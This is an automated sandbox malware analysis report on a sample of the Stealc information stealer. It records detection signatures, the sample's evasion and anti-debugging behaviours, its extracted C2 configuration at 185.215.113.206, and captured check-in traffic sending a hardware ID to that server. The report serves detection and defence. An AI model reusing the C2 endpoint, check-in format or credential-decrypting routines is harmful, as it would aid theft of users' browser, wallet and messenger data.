Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1562847
MD5:9c3907317b9374403b30537d305a9608
SHA1:cc0a6c6a0902debac4da3bad9b3eded80a503a6e
SHA256:8f0d52b51a86a71a362bd071e2ee687c7921e0c4f32a0e96fd0ba4c9a3f568e0
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2804 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9C3907317B9374403B30537D305A9608)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2044462951.0000000004E20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2085798410.00000000010BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 2804JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 2804JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-26T06:46:09.099061+010020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/c4becf79229cb002.php/CtAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpelAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/VtAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpDtAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpqlAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/1tAvira URL Cloud: Label: malware
              Found malware configuration
              Source: file.exe.2804.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              Multi AV Scanner detection for submitted file
              Source: file.exeVirustotal: Detection: 50%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00704C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00704C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007060D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_007060D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007240B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_007240B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00716960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00716960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_0070EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00716B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00716B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00709B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00709B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00709B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00709B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00707750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00707750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007118A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007118A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00713910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00713910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00711269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00711269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00711250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00711250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0071E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00714B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00714B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00714B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00714B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0071CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007123A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007123A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00712390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00712390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0070DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0070DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0071DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0071D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007016B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007016B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007016A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007016A0

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCAHost: 185.215.113.206Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 36 46 46 35 31 44 33 36 37 43 30 35 38 34 39 32 38 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 2d 2d 0d 0a Data Ascii: ------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="hwid"C6FF51D367C058492808------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="build"mars------DHIEBAAKJDHIECAAFHCA--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00704C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00704C50
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCAHost: 185.215.113.206Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 36 46 46 35 31 44 33 36 37 43 30 35 38 34 39 32 38 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 2d 2d 0d 0a Data Ascii: ------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="hwid"C6FF51D367C058492808------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="build"mars------DHIEBAAKJDHIECAAFHCA--
              Source: file.exe, 00000000.00000002.2085798410.00000000010BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/1t
              Source: file.exe, 00000000.00000002.2085798410.00000000010BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/5
              Source: file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/Vt
              Source: file.exe, 00000000.00000002.2085798410.0000000001106000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/Ct
              Source: file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpDt
              Source: file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpel
              Source: file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpql
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00709770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop,0_2_00709770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A30_2_00AB88A3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC28B00_2_00AC28B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B998960_2_00B99896
